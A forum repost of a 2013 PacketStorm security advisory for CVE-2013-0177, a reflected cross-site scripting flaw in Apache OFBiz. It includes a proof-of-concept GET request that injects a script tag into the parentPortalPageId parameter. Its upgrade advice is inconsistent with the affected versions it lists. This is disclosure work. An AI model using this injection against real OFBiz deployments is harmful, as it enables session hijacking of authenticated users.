Jump to content
Praetorian503

Apache OFBiz Cross Site Scripting

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

Apache OFBiz versions 10.04.05 and below and 11.04.01 and below suffer from a reflected cross site scripting vulnerability. Full exploitation details provided.

Title: Cross-Site Scripting (XSS) Vulnerability in Apache OFBiz
Type: Remote
Author: Juan Caillava (@jcaillava) / Marcos Garcia (@artsweb)
CVE: CVE-2013-0177
Impact: Direct execution of arbitrary code in the context of Webserver user.
Release Date: 18.01.2013

Summary
=======

Apache Open For Business (Apache OFBiz) is an open source enterprise
resource planning (ERP) system. It provides a suite of enterprise
applications that integrate and automate many of the business processes of
an enterprise.

Description
===========

Reflected Cross-Site Scripting Vulnerability affecting Screenlet.title and
Image.alt Widget attributes because the content of these two elements is
not properly escaped.


Vendor
======

Apache ofbiz - http://ofbiz.apache.org/


PoC
===

It is worth mentioning that originally the resource was using the HTTP
method POST, but it was changed to GET to exploit it more easily.
Something important to remark is that for this attack to work, the victim
should be authenticated.

Below you can see how the URL is specially crafted to expose the issue:

Affected URL: https://10.10.10.14:8443/exampleext/control/ManagePortalPages->
parameter: parentPortalPageId==[XSS]

GET
/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script>
HTTP/1.1
Host: 10.10.10.14:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101
Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer:
https://10.10.10.14:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1;
OFBiz.Visitor=10002


Solution
========

10.04.* users should upgrade to 10.04.05
11.04.01 users should upgrade to 11.04.02


Vendor Status
=============

[08.01.2013] Vulnerability discovered.
[09.01.2013] Vendor informed.
[09.01.2013] Vendor replied.
[12.01.2013] Vendor reveals patch release date.
[18.01.2013] Public advisory.

Source: PacketStorm

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...